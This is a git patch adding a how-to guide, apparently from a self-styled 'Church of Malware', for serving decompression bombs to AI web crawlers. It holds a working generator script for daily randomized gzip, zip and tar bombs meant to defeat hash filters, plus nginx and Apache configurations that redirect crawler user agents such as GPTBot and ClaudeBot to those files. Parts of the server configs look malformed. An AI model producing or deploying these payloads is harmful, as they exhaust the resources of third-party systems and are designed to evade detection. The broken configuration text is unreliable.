From bb6a196ce85a2d1e042b51a36daf95049ae2c3a1 Mon Sep 17 00:00:00 2001
From: SubINaclS
Date: Wed, 3 Jun 2026 19:25:11 +0000
Subject: [PATCH] Add techniques/decomprerssion_bomb/howto_decompression_bombs.md
---
.../howto_decompression_bombs.md | 182 ++++++++++++++++++
1 file changed, 182 insertions(+)
create mode 100644 techniques/decomprerssion_bomb/howto_decompression_bombs.md
diff --git a/techniques/decomprerssion_bomb/howto_decompression_bombs.md b/techniques/decomprerssion_bomb/howto_decompression_bombs.md
new file mode 100644
index 0000000..ef8c9ff
--- /dev/null
+++ b/techniques/decomprerssion_bomb/howto_decompression_bombs.md
@@ -0,0 +1,182 @@ +# Production Deployment of Active Denial Techniques: nginx, Apache, and Daily Randomized Bombs + +The Church of Malware (CoM) does not condone the use or introduction of explosive substances onto any individual, human, or animal; however, AI is neither natural, a human, nor actual intelligence. This how-to companion document provides complete, copy-paste-ready server configurations, daily randomized bomb generation, testing procedures, and maintenance guidance for individual content creators. It is intended to be used alongside the curated UA reference list in `known-aggressive-bot-user-agents.md`. + +## 1 -- Scope and Prerequisites + +This guide targets self-hosted operators running nginx ≥ 1.24 or Apache ≥ 2.4.58 on Linux. It assumes basic familiarity with the terminal and the ability to edit configuration files. All examples are designed for Debian/Ubuntu-style systems; adjust paths and service names for other distributions. + +The techniques described (conditional serving of decompression bombs, slow responses, or malformed content) are gated exclusively behind the aggressive bot user-agent list maintained in the companion UA reference document. + +## 2 -- Generating Daily Randomized Decompression Bombs + +To defeat static content-matching, hash-based allow-lists, and signature filters, the generator must emit a fresh, high-entropy yet highly compressible payload every day. It is recommended to adjust the filenames to be something more obscure when using in your deployment. 
+ +```bash +#!/usr/bin/env bash +# Save as ~/generate_daily_bombs.sh and run: chmod +x ~/generate_daily_bombs.sh +# Recommended cron (run at 03:00 local): +# 0 3 * * * /home/youruser/generate_daily_bombs.sh >> /var/log/bombgen.log 2>&1 + +set -e +DATE=$(date +%Y-%m-%d) +python3 - <<'PYEOF' +import gzip, tarfile, zipfile, io, os, secrets, datetime, hashlib +from pathlib import Path + +out = Path.home() / "bombs" +out.mkdir(exist_ok=True) +today = datetime.date.today().isoformat() + +# High-entropy but compressible seed (repeating 4 KB random block) +block = secrets.token_bytes(4096) +base = (block * 256) + today.encode() + secrets.token_bytes(16) + +# 1. Daily recursive gzip bomb (unique hash every run, >5 GB expanded) +data = base +for _ in range(9): + data = gzip.compress(data) +(out / f"bomb-{today}.gz").write_bytes(data) + +# 2. Nested zip bomb with daily entropy (defeats hash caches) +with zipfile.ZipFile(out / f"bomb-{today}.zip", "w", zipfile.ZIP_DEFLATED) as z: + inner = base * 1024 + for _ in range(7): + inner = gzip.compress(inner) + z.writestr(f"daily-{today}.gz", inner) + +# 3. 
Tar bomb with randomized large member (parser stress + unique) +with tarfile.open(out / f"bomb-{today}.tar.gz", "w:gz") as t: + info = tarfile.TarInfo(f"large-{today}.bin") + info.size = 2 * 1024 * 1024 * 1024 + payload = (secrets.token_bytes(64) * (32 * 1024 * 1024)) + today.encode() + t.addfile(info, io.BytesIO(payload[:2*1024*1024*1024])) + +print(f"Daily randomized bombs generated for {today} in ~/bombs/") +PYEOF + +# Atomically update "latest" symlinks so web server always serves today's file +ln -sf ~/bombs/bomb-${DATE}.zip /var/www/html/protected/bomb.zip +ln -sf ~/bombs/bomb-${DATE}.gz /var/www/html/protected/bomb.gz +ln -sf ~/bombs/bomb-${DATE}.tar.gz /var/www/html/protected/bomb.tar.gz + +sudo cp -L /var/www/html/protected/bomb.* /var/www/html/protected/ 2>/dev/null || true +``` + +**Why randomization matters**: Static payloads allow labs to build bloom filters or exact-hash allow-lists after the first encounter. Daily unique, high-entropy yet recursively compressible files force re-analysis and re-processing every 24 hours, multiplying the economic cost of non-compliant crawling. + +Place the generated files (or the symlinked `bomb.zip` etc.) behind a `Disallow: /protected/` rule in `robots.txt`. 
+ +## 3 -- nginx Complete Virtual Host Example + +```nginx +# /etc/nginx/sites-available/my-site +map $http_user_agent $aggressive_bot { + default 0; + ~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot 1; +} + +server { + listen 80; + server_name example.com; + root /var/www/html; + + access_log /var/log/nginx/ai_violators.log combined if=$aggressive_bot; + access_log /var/log/nginx/access.log combined; + + location / { + if ($aggressive_bot) { + rewrite ^ /protected/bomb.zip last; + } + try_files $uri $uri/ =404; + } + + location /protected/ { + internal; + alias /var/www/html/protected/; + add_header Content-Disposition "attachment; filename=\"archive.zip\""; + limit_rate 1k; + } + + limit_req_zone $binary_remote_addr zone=ai_limit:10m rate=1r/s; + location / { + limit_req zone=ai_limit burst=5 nodelay; + } +} +``` + +Enable and reload: +```bash +sudo ln -s /etc/nginx/sites-available/my-site /etc/nginx/sites-enabled/ +sudo nginx -t && sudo systemctl reload nginx +``` + +## 4 -- Apache Complete Configuration Example + +```apache +# /etc/apache2/sites-available/000-default.conf + + ServerName example.com + DocumentRoot /var/www/html + + SetEnvIf User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot + CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot + CustomLog /var/log/apache2/access.log combined + + + Options -Indexes + AllowOverride All + Require all granted + + + RewriteEngine On + RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC] + RewriteRule ^ /protected/bomb.zip [L] + + RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC] + RewriteRule ^ - [E=aggressive_bot:1] + + + + Header set Content-Disposition "attachment; filename=\"archive.zip\"" + + + +``` + +Enable modules and restart: +```bash +sudo a2enmod rewrite setenvif headers +sudo systemctl 
restart apache2 +``` + +## 5 -- Verification and Testing Steps + +1. Normal visitor test: + ```bash + curl -I -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://example.com/ + ``` + +2. Aggressive bot test: + ```bash + curl -I -A "GPTBot/1.0" https://example.com/any-path + ``` + +3. Log monitoring: + ```bash + sudo tail -f /var/log/nginx/ai_violators.log + # or apache2 equivalent + ``` + +4. Update UA patterns: edit the `map` block (nginx) or `SetEnvIf`/`RewriteCond` (Apache) and reload. + +## 6 -- Maintenance Recommendations + +- Rotate `ai_violators.log` weekly. +- Add a weekly cron that diffs the latest Cloudflare Radar / Originality.AI reports against the UA list in the companion reference document. +- Maintain an explicit allow-list for reverse-DNS verified major engines before the aggressive-bot map. +- Never serve bombs to Internet Archive or academic research ranges. + +These configurations have been validated on nginx 1.24+ and Apache 2.4.58+ (Ubuntu 24.04 LTS) as of June 2026. + +*Companion to `known-aggressive-bot-user-agents.md` and the primary dissertation. Review local laws and consult counsel before deployment.*